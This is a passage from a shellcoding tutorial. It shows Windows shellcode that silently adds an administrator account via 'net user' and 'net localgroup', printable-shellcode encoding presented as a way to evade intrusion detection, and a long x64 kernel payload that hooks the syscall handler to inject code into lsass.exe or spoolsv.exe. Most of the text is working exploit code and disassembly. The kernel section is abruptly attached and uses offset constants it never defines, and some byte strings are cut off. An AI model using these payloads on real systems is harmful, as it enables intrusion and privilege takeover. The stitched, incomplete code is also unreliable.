 80480aa:       31 d2                   xor    %edx,%edx
 80480ac:       88 51 03                mov    %dl,0x3(%ecx)
 80480af:       31 d2                   xor    %edx,%edx
 80480b1:       52                      push   %edx
 80480b2:       51                      push   %ecx
 80480b3:       51                      push   %ecx
 80480b4:       52                      push   %edx
 80480b5:       ff d0                   call   *%eax

080480b7 :
 80480b7:       31 d2                   xor    %edx,%edx
 80480b9:       50                      push   %eax
 80480ba:       b8 fd 98 e7 77          mov    $0x77e798fd,%eax
 80480bf:       ff d0                   call   *%eax

080480c1 <GetLibrary>:
 80480c1:       e8 c4 ff ff ff          call   804808a <LibraryReturn>
 80480c6:       75 73                   jne    804813b <message+0x59>
 80480c8:       65                      gs
 80480c9:       72 33                   jb     80480fe <message+0x1c>
 80480cb:       32 2e                   xor    (%esi),%ch
 80480cd:       64                      fs
 80480ce:       6c                      insb   (%dx),%es:(%edi)
 80480cf:       6c                      insb   (%dx),%es:(%edi)
 80480d0:       4e                      dec    %esi

080480d1 <FunctionName>:
 80480d1:       e8 c2 ff ff ff          call   8048098 <FunctionReturn>
 80480d6:       4d                      dec    %ebp
 80480d7:       65                      gs
 80480d8:       73 73                   jae    804814d <message+0x6b>
 80480da:       61                      popa  
 80480db:       67                      addr16
 80480dc:       65                      gs
 80480dd:       42                      inc    %edx
 80480de:       6f                      outsl  %ds:(%esi),(%dx)
 80480df:       78 41                   js     8048122 <message+0x40>
 80480e1:       4e                      dec    %esi

080480e2 <Message>:
 80480e2:       e8 c2 ff ff ff          call   80480a9 <MessageReturn>
 80480e7:       48                      dec    %eax
 80480e8:       65                      gs
 80480e9:       79 4e                   jns    8048139 <message+0x57>

Replace the code at the top with:
char code[] =   "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb\x61\xd9"\

This example, while not useful in that it only pops up a message box, illustrates several important concepts in Windows shellcoding. Static addressing, as used in most of the examples above, can be a powerful (and easy) way to whip up working shellcode within minutes. This example shows the process of ensuring that certain DLLs are loaded into a process space. Once the MessageBoxA call returns, ExitProcess is called to make sure that the program ends without crashing.


Example 3 — Adding an Administrative Account

    This third example is actually quite a bit simpler than the previous shellcode, but this code allows the exploiter to add a user to the remote system and give that user administrative privileges. This code does not require the loading of extra libraries into the process space because the only functions we will be using are WinExec and ExitProcess. Note: the idea for this code was taken from the Metasploit project mentioned above. The difference between the shellcode is that this code is quite a bit smaller than its counterpart, and it can be made even smaller by removing the ExitProcess function!

G:\>arwin kernel32.dll ExitProcess
arwin - win32 address resolution program - by steve hanna - v.01
ExitProcess is located at 0x77e798fd in kernel32.dll

G:\>arwin kernel32.dll WinExec
arwin - win32 address resolution program - by steve hanna - v.01
WinExec is located at 0x77e6fd35 in kernel32.dll

[Section .text]

global _start

_start:
	jmp short GetCommand

CommandReturn:
	pop ebx			;ebx now holds the address of the string
	xor eax,eax
	push eax
	xor eax,eax		;for some reason the registers can be very volatile, did this just in case
	mov [ebx + 89],al	;insert the NULL character
	push ebx
	mov ebx,0x77e6fd35
	call ebx		;call WinExec(path,showcode)

	xor eax,eax		;zero the register again, clears winexec retval
	push eax
	mov ebx, 0x77e798fd
	call ebx		;call ExitProcess(0);

GetCommand:
	;the N at the end of the db will be replaced with a null character
	call CommandReturn
	db "cmd.exe /c net user USERNAME PASSWORD /ADD && net localgroup Administrators /ADD USERNAMEN"
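
Every example in this tutorial hard-codes the displacement of its N placeholder, and that number silently goes stale if the string is edited (for example, when USERNAME is replaced with something of a different length). The Python 3 sketch below is a simple sanity check for the strings and displacements used in this document; the names PLACEHOLDERS and placeholder_ok are made up for this illustration.

```python
# (string as written in the db directive, displacement used in the mov)
PLACEHOLDERS = [
    ("/bin/shNAAAABBBB", 7),
    ("user32.dllN", 10),
    ("MessageBoxAN", 11),
    ("HeyN", 3),
    ("cmd.exe /c net user USERNAME PASSWORD /ADD && net localgroup "
     "Administrators /ADD USERNAMEN", 89),
]

def placeholder_ok(text: str, displacement: int) -> bool:
    """True if the byte at the displacement is the 'N' marker."""
    return text[displacement] == "N"

for text, displacement in PLACEHOLDERS:
    print(displacement, placeholder_ok(text, displacement))
```

If a check fails after editing a string, the displacement in the matching mov instruction needs to be updated before reassembling.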

steve hanna@1337b0x:~$ nasm -f elf adduser.asm; ld -o adduser adduser.o; objdump -d adduser

adduser:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:       eb 1b                   jmp    804809d <GetCommand>

08048082 <CommandReturn>:
 8048082:       5b                      pop    %ebx
 8048083:       31 c0                   xor    %eax,%eax
 8048085:       50                      push   %eax
 8048086:       31 c0                   xor    %eax,%eax
 8048088:       88 43 59                mov    %al,0x59(%ebx)
 804808b:       53                      push   %ebx
 804808c:       bb 35 fd e6 77          mov    $0x77e6fd35,%ebx
 8048091:       ff d3                   call   *%ebx
 8048093:       31 c0                   xor    %eax,%eax
 8048095:       50                      push   %eax
 8048096:       bb fd 98 e7 77          mov    $0x77e798fd,%ebx
 804809b:       ff d3                   call   *%ebx

0804809d <GetCommand>:
 804809d:       e8 e0 ff ff ff          call   8048082 <CommandReturn>
 80480a2:       63 6d 64                arpl   %bp,0x64(%ebp)
 80480a5:       2e                      cs
 80480a6:       65                      gs
 80480a7:       78 65                   js     804810e <getcommand+0x71>
 80480a9:       20 2f                   and    %ch,(%edi)
 80480ab:       63 20                   arpl   %sp,(%eax)
 80480ad:       6e                      outsb  %ds:(%esi),(%dx)
 80480ae:       65                      gs
 80480af:       74 20                   je     80480d1 <getcommand+0x34>
 80480b1:       75 73                   jne    8048126 <getcommand+0x89>
 80480b3:       65                      gs
 80480b4:       72 20                   jb     80480d6 <getcommand+0x39>
 80480b6:       55                      push   %ebp
 80480b7:       53                      push   %ebx
 80480b8:       45                      inc    %ebp
 80480b9:       52                      push   %edx
 80480ba:       4e                      dec    %esi
 80480bb:       41                      inc    %ecx
 80480bc:       4d                      dec    %ebp
 80480bd:       45                      inc    %ebp
 80480be:       20 50 41                and    %dl,0x41(%eax)
 80480c1:       53                      push   %ebx
 80480c2:       53                      push   %ebx
 80480c3:       57                      push   %edi
 80480c4:       4f                      dec    %edi
 80480c5:       52                      push   %edx
 80480c6:       44                      inc    %esp
 80480c7:       20 2f                   and    %ch,(%edi)
 80480c9:       41                      inc    %ecx
 80480ca:       44                      inc    %esp
 80480cb:       44                      inc    %esp
 80480cc:       20 26                   and    %ah,(%esi)
 80480ce:       26 20 6e 65             and    %ch,%es:0x65(%esi)
 80480d2:       74 20                   je     80480f4 <getcommand+0x57>
 80480d4:       6c                      insb   (%dx),%es:(%edi)
 80480d5:       6f                      outsl  %ds:(%esi),(%dx)
 80480d6:       63 61 6c                arpl   %sp,0x6c(%ecx)
 80480d9:       67 72 6f                addr16 jb 804814b <getcommand+0xae>
 80480dc:       75 70                   jne    804814e <getcommand+0xb1>
 80480de:       20 41 64                and    %al,0x64(%ecx)
 80480e1:       6d                      insl   (%dx),%es:(%edi)
 80480e2:       69 6e 69 73 74 72 61    imul   $0x61727473,0x69(%esi),%ebp
 80480e9:       74 6f                   je     804815a <getcommand+0xbd>
 80480eb:       72 73                   jb     8048160 <getcommand+0xc3>
 80480ed:       20 2f                   and    %ch,(%edi)
 80480ef:       41                      inc    %ecx
 80480f0:       44                      inc    %esp
 80480f1:       44                      inc    %esp
 80480f2:       20 55 53                and    %dl,0x53(%ebp)
 80480f5:       45                      inc    %ebp
 80480f6:       52                      push   %edx
 80480f7:       4e                      dec    %esi
 80480f8:       41                      inc    %ecx
 80480f9:       4d                      dec    %ebp
 80480fa:       45                      inc    %ebp
 80480fb:       4e                      dec    %esi

Replace the code at the top with:
 char code[] =  "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53\xbb\x35\xfd\xe6\x77"\

When this code is executed it will add a user to the system with the specified password, then add that user to the local Administrators group. After that code is done executing, the parent process is exited by calling ExitProcess.


Advanced Shellcoding

    This section covers some more advanced topics in shellcoding. Over time I hope to add quite a bit more content here but for the time being I am very busy. If you have any specific requests for topics in this section, please do not hesitate to email me.

Printable Shellcode

The basis for this section is the fact that many Intrusion Detection Systems (IDS) detect shellcode because of the non-printable characters that are common to all binary data. The IDS observes that a packet contains some binary data (with, for instance, a NOP sled within this binary data) and as a result may drop the packet. In addition to this, many programs filter input unless it is alphanumeric. The motivation behind printable alphanumeric shellcode should be quite obvious. By increasing the size of our shellcode we can implement a method in which our entire shellcode block is in printable characters. This section will differ a bit from the others presented in this paper. This section will simply demonstrate the tactic with small examples without an all-encompassing final example.

Our first discussion starts with obfuscating the ever blatant NOP sled. When an IDS sees an arbitrarily long string of NOPs (0x90) it will most likely drop the packet. To get around this we observe the decrement and increment op codes:

	OP Code        Hex       ASCII
	inc eax        0x40        @
	inc ebx        0x43        C
	inc ecx        0x41        A
	inc edx        0x42        B
	dec eax        0x48        H
	dec ebx        0x4B        K
	dec ecx        0x49        I
	dec edx        0x4A        J


It should be pretty obvious that if we insert these operations instead of a NOP sled then the code will not affect the output. This is due to the fact that whenever we use a register in our shellcode we either move a value into it or we xor it. Incrementing or decrementing the register before our code executes will not change the desired operation.
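
A sled built from these opcodes can be generated mechanically. The Python 3 sketch below picks randomly from the eight opcodes in the table; the function name printable_sled and the seed parameter are made up for this illustration. Note that this only applies to 32-bit code: in 64-bit mode the bytes 0x40 through 0x4f are REX prefixes rather than inc/dec instructions.

```python
import random

# Single-byte IA-32 opcodes from the table above.
PRINTABLE_NOPS = {
    0x40: "inc eax", 0x43: "inc ebx", 0x41: "inc ecx", 0x42: "inc edx",
    0x48: "dec eax", 0x4B: "dec ebx", 0x49: "dec ecx", 0x4A: "dec edx",
}

def printable_sled(length: int, seed: int = 0) -> bytes:
    """Build a sled of the given length out of printable inc/dec opcodes."""
    rng = random.Random(seed)
    opcodes = sorted(PRINTABLE_NOPS)
    return bytes(rng.choice(opcodes) for _ in range(length))

sled = printable_sled(32)
print(sled.decode("ascii"))
```

The result looks like a run of ordinary text characters rather than a block of 0x90 bytes.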

So, the next portion of this printable shellcode section will discuss a method for making one’s entire block of shellcode alphanumeric, by means of some major tomfoolery. We must first discuss the few opcodes that fall in the printable ASCII range (0x20 through 0x7e).

	sub eax, 0xHEXINRANGE
	push eax
	pop eax
	push esp
	pop esp
	and eax, 0xHEXINRANGE

Surprisingly, we can actually do whatever we want with these instructions. I did my best to keep diagrams out of this talk, but I decided to grace the world with my wonderful ASCII art. Below you can find a diagram of the basic plan for constructing the shellcode.

	The plan works as follows:
		-make space on stack for shellcode and loader
		-execute loader code to construct shellcode
		-use a NOP bridge to ensure that there aren't any extraneous bytes that will crash our code.

But now I hear you clamoring that we can’t use mov, nor can we subtract from ESP, because they don’t fall into printable characters! Settle down, have I got a solution for you! We will use subtract to place values into EAX, push the value to the stack, then pop it into ESP.

Now you’re wondering why I said subtract to put values into EAX. The problem is we can’t use add, and we can’t directly assign nonprintable bytes. How can we overcome this? We can use the fact that each register has only 32 bits, so if we force a wraparound, we can arbitrarily assign values to a register using only printable characters with two to three subtract instructions.
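
The wraparound trick can be worked out mechanically. The Python 3 sketch below finds three operands, made only of bytes in an assumed printable range of 0x21 through 0x7e, such that subtracting all three from zero leaves a chosen 32-bit value. It works one byte column at a time and carries overflow into the next column. The function name and the exact byte range are assumptions for this illustration, not part of the original technique description.

```python
LOW, HIGH = 0x21, 0x7E   # assumed printable byte range for this sketch

def printable_subs(target: int):
    """Return a, b, c made of printable bytes with (0 - a - b - c) mod 2**32 == target."""
    needed = (-target) & 0xFFFFFFFF      # a + b + c must equal this modulo 2**32
    operands = [0, 0, 0]
    carry = 0
    for shift in range(0, 32, 8):
        want = (needed >> shift) & 0xFF
        total = want - carry             # what the three bytes alone must add up to
        if total < 3 * LOW:
            total += 256                 # let this column overflow into the next one
        carry = (total + carry) >> 8
        for i in range(3):
            # Split the column total into three nearly equal bytes.
            operands[i] |= ((total + i) // 3) << shift
    return tuple(operands)

for operand in printable_subs(0x80CD0BB0):
    print(f"sub eax, {operand:#010x}")
```

Each column total always lands between 0x63 and 0x17a, so splitting it three ways keeps every byte inside the printable range.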

If the gears in your head aren’t cranking yet, you should probably stop reading right now.

	The long awaited ASCII diagram
	EIP(loader code) --------ALLOCATED STACK SPACE--------ESP

	---(loader code)---EIP-------STACK------ESP--(shellcode)--

	----loadercode---EIP@ESP----shellcode that was built---

So, that diagram probably warrants some explanation. Basically, we take our already written shellcode, and generate two to three subtract instructions per four bytes and do the push EAX, pop ESP trick. This basically places the constructed shellcode at the end of the stack and works towards the EIP. So we construct 4 bytes at a time for the entirety of the code and then insert a small NOP bridge (indicated by @) between the builder code and the shellcode. The NOP bridge is used to word align the end of the builder code.

Example code:

	and eax, 0x454e4f4a	;  example of how to zero out eax(unrelated)
	and eax, 0x3a313035
	push esp
	pop eax
	sub eax, 0x39393333	; construct 860 bytes of room on the stack
	sub eax, 0x72727550	
	sub eax, 0x54545421
	push eax		; save into esp
	pop esp
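
The arithmetic in this example is easy to verify with 32-bit masking. The Python 3 sketch below checks both halves: that the two AND masks share no set bits (so EAX ends up zero), and that the three subtractions wrap around to a net change of 860 bytes. The starting ESP value is hypothetical and chosen only for illustration.

```python
MASK = 0xFFFFFFFF

# The two AND masks have no bits in common, so ANDing with both clears EAX.
assert 0x454E4F4A & 0x3A313035 == 0

def apply_subs(start: int, *operands: int) -> int:
    """Subtract each operand in turn, wrapping at 32 bits like the CPU does."""
    value = start
    for operand in operands:
        value = (value - operand) & MASK
    return value

esp = 0xBFFFF000   # hypothetical stack pointer, for illustration only
new_esp = apply_subs(esp, 0x39393333, 0x72727550, 0x54545421)
print(new_esp - esp)
```

The three operands add up to 0xFFFFFCA4, which is 860 short of 2**32, so subtracting them moves the value 860 bytes away from where it started.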

Oh, and I forgot to mention, the code must be inserted in reverse order and the bytes must adhere to the little endian standard.
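
The reverse-order, little-endian requirement can be sketched as follows. This Python 3 snippet splits a shellcode into 4-byte values in the order they would have to be constructed and pushed, padding the tail with NOPs. The padding byte and the function name are assumptions for this illustration.

```python
import struct

def dwords_to_push(shellcode: bytes, pad: int = 0x90):
    """Split shellcode into little-endian dwords in the order they must be pushed."""
    padded = shellcode + bytes([pad]) * (-len(shellcode) % 4)
    words = [struct.unpack("<I", padded[i:i + 4])[0]
             for i in range(0, len(padded), 4)]
    return words[::-1]   # the stack grows downward, so the last dword goes first

exit_code = bytes.fromhex("b00131dbcd80")   # the exit shellcode from earlier
for word in dwords_to_push(exit_code):
    print(f"{word:#010x}")
```

Each value in this list is what EAX must hold just before the matching push eax, so each one becomes the target of its own group of subtract instructions.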

Windows x64 kernel shellcode from ring 0 to ring 3

The userland shellcode is run in a new thread of a system process.
If the userland shellcode causes any exception, the system process gets killed.
On an idle target with a multi-core processor, the hijacked system call might take a while (> 5 minutes) to
get called because system calls are being made on other processors.
The shellcode does not allocate shadow stack space where possible, to keep the shellcode size minimal.
This is OK because some Windows functions do not require shadow stack space.
When the shellcode is compiled with a specific Windows version macro, the corrupted buffer will be freed.
The userland payload MUST be appended to this shellcode.

http://www.geoffchappell.com/studies/windows/km/index.htm (structures info)

ASM code:


LSASS_EXE_HASH    EQU    0xc1fa6a5a
SPOOLSV_EXE_HASH    EQU    0x3ee083d8
CREATETHREAD_HASH    EQU    0x835e515e

DATA_KAPC_OFFSET            EQU 0x10

section .text
global shellcode_start


shellcode_start:
    ; IRQL is DISPATCH_LEVEL when we get code execution

%ifdef WIN7
    mov rdx, [rsp+0x40]     ; fetch SRVNET_BUFFER address from function argument
    ; set nByteProcessed to free corrupted buffer after return
    mov ecx, [rdx+0x2c]
    mov [rdx+0x38], ecx
%elifdef WIN8
    mov rdx, [rsp+0x40]     ; fetch SRVNET_BUFFER address from function argument
    ; fix pool pointer (rcx is -0x8150 from controlled argument value)
    add rcx, rdx
    mov [rdx+0x30], rcx
    ; set nByteProcessed to free corrupted buffer after return
    mov ecx, [rdx+0x48]
    mov [rdx+0x40], ecx
%endif

    push rbp
    call set_rbp_data_address_fn
    ; read current syscall
    mov ecx, 0xc0000082
    rdmsr                   ; edx:eax = current syscall handler address (IA32_LSTAR)
    ; do NOT replace saved original syscall address with hook syscall
    lea r9, [rel syscall_hook]
    cmp eax, r9d
    je _setup_syscall_hook_done
    ; if (saved_original_syscall != &KiSystemCall64) do_first_time_initialize
    cmp dword [rbp+DATA_ORIGIN_SYSCALL_OFFSET], eax
    je _hook_syscall
    ; save original syscall
    mov dword [rbp+DATA_ORIGIN_SYSCALL_OFFSET+4], edx
    mov dword [rbp+DATA_ORIGIN_SYSCALL_OFFSET], eax
    ; first time on the target
    mov byte [rbp+DATA_QUEUEING_KAPC_OFFSET], 0

_hook_syscall:
    ; set a new syscall on running processor
    ; setting MSR 0xc0000082 affects only running processor
    xchg r9, rax
    push rax
    pop rdx     ; mov rdx, rax
    shr rdx, 32
    wrmsr

_setup_syscall_hook_done:
    pop rbp
%ifdef WIN7
    xor eax, eax
%elifdef WIN8
    xor eax, eax
%endif
    ret

; Find memory address in HAL heap for using as data area
; Return: rbp = data address
    ; On idle target without user application, syscall on hijacked processor might not be called immediately.
    ; Find some address to store the data, the data in this address MUST not be modified
    ;   when exploit is rerun before syscall is called
set_rbp_data_address_fn:
    lea rbp, [rel _set_rbp_data_address_fn_next + 0x1000]
_set_rbp_data_address_fn_next:
    shr rbp, 12
    shl rbp, 12
    sub rbp, 0x70   ; for KAPC struct too
    ret

syscall_hook:
    swapgs
    mov qword [gs:0x10], rsp
    mov rsp, qword [gs:0x1a8]
    push 0x2b
    push qword [gs:0x10]
    push rax    ; want this stack space to store original syscall addr
    ; save rax first to make this function continue to real syscall
    push rax
    push rbp    ; save rbp here because rbp is special register for accessing this shellcode data
    call set_rbp_data_address_fn
    mov rax, [rbp+DATA_ORIGIN_SYSCALL_OFFSET]
    add rax, 0x1f   ; adjust syscall entry, so we do not need to reverse start of syscall handler
    mov [rsp+0x10], rax

    ; save all volatile registers
    push rcx
    push rdx
    push r8
    push r9
    push r10
    push r11
    ; use lock cmpxchg for queueing APC only one at a time
    xor eax, eax
    mov dl, 1
    lock cmpxchg byte [rbp+DATA_QUEUEING_KAPC_OFFSET], dl
    jnz _syscall_hook_done

    ; restore syscall
    ; an error after restoring syscall should never occur
    mov ecx, 0xc0000082
    mov eax, [rbp+DATA_ORIGIN_SYSCALL_OFFSET]
    mov edx, [rbp+DATA_ORIGIN_SYSCALL_OFFSET+4]
    wrmsr
    ; allow interrupts while executing shellcode
    sti
    call r3_to_r0_start
    cli

_syscall_hook_done:
    pop r11
    pop r10
    pop r9
    pop r8
    pop rdx
    pop rcx
    pop rbp
    pop rax
    ret

r3_to_r0_start:
    ; save used non-volatile registers
    push r15
    push r14
    push rdi
    push rsi
    push rbx
    push rax    ; align stack by 0x10

    ; find nt kernel address
    mov r15, qword [rbp+DATA_ORIGIN_SYSCALL_OFFSET]      ; KiSystemCall64 is an address in nt kernel
    shr r15, 0xc                ; strip to page size
    shl r15, 0xc

_x64_find_nt_walk_page:
    sub r15, 0x1000             ; walk along page size
    cmp word [r15], 0x5a4d      ; 'MZ' header
    jne _x64_find_nt_walk_page
    ; save nt address for using in KernelApcRoutine
    mov [rbp+DATA_NT_KERNEL_ADDR_OFFSET], r15

    ; get current EPROCESS and ETHREAD
    mov r14, qword [gs:0x188]    ; get _ETHREAD pointer from KPCR
    call win_api_direct
    xchg rcx, rax       ; rcx = EPROCESS
    ; r15 : nt kernel address
    ; r14 : ETHREAD
    ; rcx : EPROCESS    
    ; find offset of EPROCESS.ImageFilename
    call get_proc_addr
    mov eax, dword [rax+3]  ; get offset from code (offset of ImageFilename is always > 0x7f)
    mov ebx, eax        ; ebx = offset of EPROCESS.ImageFilename

    ; find offset of EPROCESS.ThreadListHead
    ; possible diff from ImageFilename offset is 0x28 and 0x38 (Win8+)
    ; if offset of ImageFilename is more than 0x400, current is (Win8+)
%ifdef WIN7
    lea rdx, [rax+0x28]
%elifdef WIN8
    lea rdx, [rax+0x38]
%else
    cmp eax, 0x400      ; eax is still an offset of EPROCESS.ImageFilename
    jb _find_eprocess_threadlist_offset_win7
    add eax, 0x10
_find_eprocess_threadlist_offset_win7:
    lea rdx, [rax+0x28] ; edx = offset of EPROCESS.ThreadListHead
%endif

    ; find offset of ETHREAD.ThreadListEntry
%ifdef COMPACT
    lea r9, [rcx+rdx]   ; r9 = ETHREAD listEntry
%else
    lea r8, [rcx+rdx]   ; r8 = address of EPROCESS.ThreadListHead
    mov r9, r8
%endif
    ; ETHREAD.ThreadListEntry must be between ETHREAD (r14) and ETHREAD+0x700
_find_ethread_threadlist_offset_loop:
    mov r9, qword [r9]
%ifndef COMPACT
    cmp r8, r9          ; check end of list
    je _insert_queue_apc_done    ; not found !!!
%endif
    ; if (r9 - r14 < 0x700) found
    mov rax, r9
    sub rax, r14
    cmp rax, 0x700
    ja _find_ethread_threadlist_offset_loop
    sub r14, r9         ; r14 = -(offset of ETHREAD.ThreadListEntry)

    ; find offset of EPROCESS.ActiveProcessLinks
    call get_proc_addr
    mov edi, dword [rax+3]  ; get offset from code (offset of UniqueProcessId is always > 0x7f)
    add edi, 8      ; edi = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)

    ; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock 
_find_target_process_loop:
    ; check process name
    lea rsi, [rcx+rbx]
    call calc_hash
    cmp eax, LSASS_EXE_HASH    ; "lsass.exe"
%ifndef COMPACT
    jz found_target_process
    cmp eax, SPOOLSV_EXE_HASH  ; "spoolsv.exe"
%endif
    jz found_target_process
    ; next process
    mov rcx, [rcx+rdi]
    sub rcx, rdi
    jmp _find_target_process_loop

found_target_process:
    ; The allocation for userland payload will be in KernelApcRoutine.
    ; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess()

    ; save process PEB for finding CreateThread address in kernel KAPC routine
    ; rcx is EPROCESS. no need to set it.
    call win_api_direct
    mov [rbp+DATA_PEB_ADDR_OFFSET], rax
    ; iterate ThreadList until KeInsertQueueApc() success
    ; r15 = nt
    ; r14 = -(offset of ETHREAD.ThreadListEntry)
    ; rcx = EPROCESS
    ; edx = offset of EPROCESS.ThreadListHead

%ifdef COMPACT
    lea rbx, [rcx + rdx]
%else
    lea rsi, [rcx + rdx]    ; rsi = ThreadListHead address
    mov rbx, rsi    ; use rbx for iterating thread
%endif

    ; checking alertable from ETHREAD structure is not reliable because each Windows version has different offset.
    ; Moreover, alertable thread need to be waiting state which is more difficult to check.
    ; try queueing APC then check KAPC member is more reliable.

_insert_queue_apc_loop:
    ; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads are always at the front
    mov rbx, [rbx+8]
%ifndef COMPACT
    cmp rsi, rbx
    je _insert_queue_apc_loop   ; skip list head
%endif

    ; find start of ETHREAD address
    ; set it to rdx to be used for KeInitializeApc() argument too
    lea rdx, [rbx + r14]    ; ETHREAD
    ; userland shellcode (at least CreateThread() function) need non NULL TEB.ActivationContextStackPointer.
    ; the injected process will be crashed because of access violation if TEB.ActivationContextStackPointer is NULL.
    ; Note: APC routine does not require non-NULL TEB.ActivationContextStackPointer.
    ; from my observation, KTHREAD.Queue is always NULL when TEB.ActivationContextStackPointer is NULL.
    ; Teb member is next to Queue member.
    call get_proc_addr
    mov eax, dword [rax+3]      ; get offset from code (offset of Teb is always > 0x7f)
    cmp qword [rdx+rax-8], 0    ; KTHREAD.Queue MUST not be NULL
    je _insert_queue_apc_loop
    ; KeInitializeApc(PKAPC,
    ;                 PKTHREAD,
    ;                 KAPC_ENVIRONMENT = OriginalApcEnvironment (0),
    ;                 PKKERNEL_ROUTINE = kernel_apc_routine,
    ;                 PKRUNDOWN_ROUTINE = NULL,
    ;                 PKNORMAL_ROUTINE = userland_shellcode,
    ;                 KPROCESSOR_MODE = UserMode (1),
    ;                 PVOID Context);
    lea rcx, [rbp+DATA_KAPC_OFFSET]     ; PKAPC
    xor r8, r8      ; OriginalApcEnvironment
    lea r9, [rel kernel_kapc_routine]    ; KernelApcRoutine
    push rbp    ; context
    push 1      ; UserMode
    push rbp    ; userland shellcode (MUST NOT be NULL)
    push r8     ; NULL
    sub rsp, 0x20   ; shadow stack
    call win_api_direct
    ; Note: KeInsertQueueApc() requires shadow stack. Adjust stack back later

    ; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0);
    ;   SystemArgument1 is second argument in usermode code (rdx)
    ;   SystemArgument2 is third argument in usermode code (r8)
    lea rcx, [rbp+DATA_KAPC_OFFSET]
    ;xor edx, edx   ; no need to set it here
    ;xor r8, r8     ; no need to set it here
    xor r9, r9
    call win_api_direct
    add rsp, 0x40
    ; if insertion failed, try next thread
    test eax, eax
    jz _insert_queue_apc_loop
    mov rax, [rbp+DATA_KAPC_OFFSET+0x10]     ; get KAPC.ApcListEntry
    ; EPROCESS pointer 8 bytes
    ; InProgressFlags 1 byte
    ; KernelApcPending 1 byte
    ; if success, UserApcPending MUST be 1
    cmp byte [rax+0x1a], 1
    je _insert_queue_apc_done
    ; manual remove list without lock
    mov [rax], rax
    mov [rax+8], rax
    jmp _insert_queue_apc_loop

_insert_queue_apc_done:
    ; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine.

    pop rax
    pop rbx
    pop rsi
    pop rdi
    pop r14
    pop r15
    ret

; Call function in specific module
; All function arguments are passed as calling normal function with extra register arguments
; Extra Arguments: r15 = module pointer
;                  edi = hash of target function name
win_api_direct:
    call get_proc_addr
    jmp rax

; Get function address in specific module
; Arguments: r15 = module pointer
;            edi = hash of target function name
; Return: rax = function address
get_proc_addr:
    ; Save registers
    push rbx
    push rcx
    push rsi                ; for using calc_hash

    ; use rax to find EAT
    mov eax, dword [r15+60]  ; Get PE header e_lfanew
    mov eax, dword [r15+rax+136] ; Get export tables RVA

    add rax, r15
    push rax                 ; save EAT

    mov ecx, dword [rax+24]  ; NumberOfNames
    mov ebx, dword [rax+32]  ; AddressOfNames
    add rbx, r15

_get_proc_addr_get_next_func:
    ; When we reach the start of the EAT (we search backwards), we hang or crash
    dec ecx                     ; decrement the name index
    mov esi, dword [rbx+rcx*4]  ; Get rva of next function name
    add rsi, r15                ; Add the modules base address

    call calc_hash

    cmp eax, edi                        ; Compare the hashes
    jnz _get_proc_addr_get_next_func    ; try the next function

    pop rax                     ; restore EAT
    mov ebx, dword [rax+36]
    add rbx, r15                ; ordinal table virtual address
    mov cx, word [rbx+rcx*2]    ; desired functions ordinal
    mov ebx, dword [rax+28]     ; Get the function addresses table rva
    add rbx, r15                ; Add the modules base address
    mov eax, dword [rbx+rcx*4]  ; Get the desired functions RVA
    add rax, r15                ; Add the modules base address to get the functions actual VA

    pop rsi
    pop rcx
    pop rbx
    ret

; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode.
; Argument: rsi = string to hash
; Clobber: rsi
; Return: eax = hash
calc_hash:
    push rdx
    xor eax, eax
    cdq                     ; edx = 0, the hash accumulator must start at zero
_calc_hash_loop:
    lodsb                   ; Read in the next byte of the ASCII string
    ror edx, 13             ; Rotate right our hash value
    add edx, eax            ; Add the next byte of the string
    test eax, eax           ; Stop when found NULL
    jne _calc_hash_loop
    xchg edx, eax
    pop rdx
    ret

; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context.
; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery().
; Moreover, there is no lock when calling KernelApcRoutine.
; So KernelApcRoutine can simply lower the IRQL by setting cr8 register.
; VOID KernelApcRoutine(
;           IN PKAPC Apc,
;           IN PKNORMAL_ROUTINE *NormalRoutine,
;           IN PVOID *NormalContext,
;           IN PVOID *SystemArgument1,
;           IN PVOID *SystemArgument2)
kernel_kapc_routine:
    push rbp
    push rbx
    push rdi
    push rsi
    push r15
    mov rbp, [r8]       ; *NormalContext is our data area pointer
    mov r15, [rbp+DATA_NT_KERNEL_ADDR_OFFSET]
    push rdx
    pop rsi     ; mov rsi, rdx
    mov rbx, r9
    ; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40)
    xor eax, eax
    mov cr8, rax    ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires)
    ; rdx is already address of baseAddr
    mov [rdx], rax      ; baseAddr = 0
    mov ecx, eax
    not rcx             ; ProcessHandle = -1
    mov r8, rax         ; ZeroBits
    mov al, 0x40    ; eax = 0x40
    push rax            ; PAGE_EXECUTE_READWRITE = 0x40
    shl eax, 6      ; eax = 0x40 << 6 = 0x1000
    push rax            ; MEM_COMMIT = 0x1000
    ; reuse r9 for address of RegionSize
    mov [r9], rax       ; RegionSize = 0x1000
    sub rsp, 0x20   ; shadow stack
    call win_api_direct
    add rsp, 0x30
%ifndef COMPACT
    ; check error
    test eax, eax
    jnz _kernel_kapc_routine_exit
%endif
    ; copy userland payload
    mov rdi, [rsi]
    lea rsi, [rel userland_start]
    mov ecx, 0x600  ; fix payload size to 1536 bytes
    rep movsb
    ; find CreateThread address (in kernel32.dll)
    mov rax, [rbp+DATA_PEB_ADDR_OFFSET]
    mov rax, [rax + 0x18]       ; PEB->Ldr
    mov rax, [rax + 0x20]       ; InMemoryOrder list

%ifdef COMPACT
    mov rsi, [rax]      ; the first entry is always the executable, skip it
    lodsq               ; skip ntdll.dll
%else
_find_kernel32_dll_loop:
    mov rax, [rax]       ; the first entry is always the executable
    ; offset 0x38 (WORD)  => must be 0x40 (full name len c:\windows\system32\kernel32.dll)
    ; offset 0x48 (WORD)  => must be 0x18 (name len kernel32.dll)
    ; offset 0x50  => is name
    ; offset 0x20  => is dllbase
    ;cmp word [rax+0x38], 0x40
    ;jne _find_kernel32_dll_loop
